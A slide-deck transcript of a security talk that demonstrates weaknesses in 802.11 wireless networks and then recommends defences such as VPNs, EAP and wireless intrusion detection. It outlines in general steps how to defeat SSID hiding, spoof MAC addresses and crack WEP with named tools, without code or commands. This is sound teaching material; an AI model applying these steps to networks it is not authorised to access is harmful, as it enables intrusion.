150 likes | 255 Views
Demonstration of Wireless Insecurities Presented by: Jason Wylie, CISM, CISSP. Demonstration of Wireless Insecurities. Agenda: Demonstrate ease of access to unprotected WLAN Setup 802.11 standard security roll-out (SSID and MAC restrictions)
E N D
Demonstration of Wireless InsecuritiesPresented by: Jason Wylie, CISM, CISSP
Demonstration of Wireless Insecurities Agenda: • Demonstrate ease of access to unprotected WLAN • Setup 802.11 standard security roll-out (SSID and MAC restrictions) • Demonstrate ability to locate an AP and spoof MAC Adresses • Set up WEP on AP and demonstrate WEP weaknesses • Discuss methods of providing security over wireless
Equipment / Tools Linksys Access Point Laptop with Linksys PCMCIA Wlan Cards Unauthorized “Hacker” Client System NetStumbler, SMAC, WEPCrack, and Ethereal Web Server
Rogue (unprotected) Access Point • No Security Measures in place • Access Point Advertises SSID • Casual Users can browse your network • Typical of departmental or “personal “ access points • An intruder starts with internal access to your network
Baseline 802.11Wireless Security • Disabling SSID Broadcast • Service Set Identifier Broadcasting • MAC Restrictions • Limit participation to only allowed MAC addresses • WEP • Wired Equivalent Privacy
Baseline 802.11Wireless Security ~ Disabling SSID Broadcast ~ ADDED SECURITY: • SSID is not broadcast to unknown clients. CONS: • Requires manual input of SSID on all client systems. • SSID information is sent in “plain-text” from the client to the AP.
Getting past SSID Obscurity • Sniffing traffic on the WLAN • Identify SSID broadcast from employee system during AP association. • Configure Wireless card with discovered SSID.
Baseline 802.11Wireless Security ~ MAC Filtering ~ ADDED SECURITY: • WLAN association is restricted from unknown MAC addresses. CONS: • Requires manual input of all client system MAC addresses into the AP. • MAC “spoofing” is a trivial task.
Getting past MAC Filtering • Sniffing traffic on the WLAN • Identify valid MAC addresses from employee WLAN interaction. • Spoof the MAC address of the employee’s system.
Baseline 802.11Wireless Security~ WEP Encryption ~ ADDED SECURITY: • Traffic is encrypted during transmission CONS: • Requires distribution of WEP keys to employees. • WEP keys can be broken easily
Getting past WEP • Sniffing traffic on the WLAN • Gather at least 500MB of traffic • Process through Wepcrack • Keys to the kingdom are revealed
Alternatives • Limit Broadcast Range of Access Points • Put the Access Points outside the Firewall • Use strong authentication • Encrypt traffic with IPSEC VPN (3DES or AES) • Use proprietary Key Rotation Methods • EAP (LEAP – Cisco, EAP-TLS, EAP-TTS) • Manually Scan for “Rogue” Access Points • Install IDS for WLANs • Detects MAC Spoofing • Identifies “Rogue” Access Points.
Extensible Authentication Protocol (RFC 2284) • Provides a flexible link layer security framework • Simple encapsulation protocol • No dependency on IP • ACK/NAK, no windowing • No fragmentation support • Few link layer assumptions • Can run over any link layer (PPP, 802, etc.) • Does not assume physically secure link • Assumes no re-ordering • Can run over lossy or lossless media • Retransmission responsibility of authenticator (not needed for 802.1X or 802.11)
URLs for More Information • IEEE 802 web page: http://grouper.ieee.org/groups/802/dots.html • IETF web page: http://www.ietf.org/ • The “Unofficial 802.11 Security” Web Site: http://www.drizzle.com/~aboba/IEEE/ • 80211 Planet http://www.80211-planet.com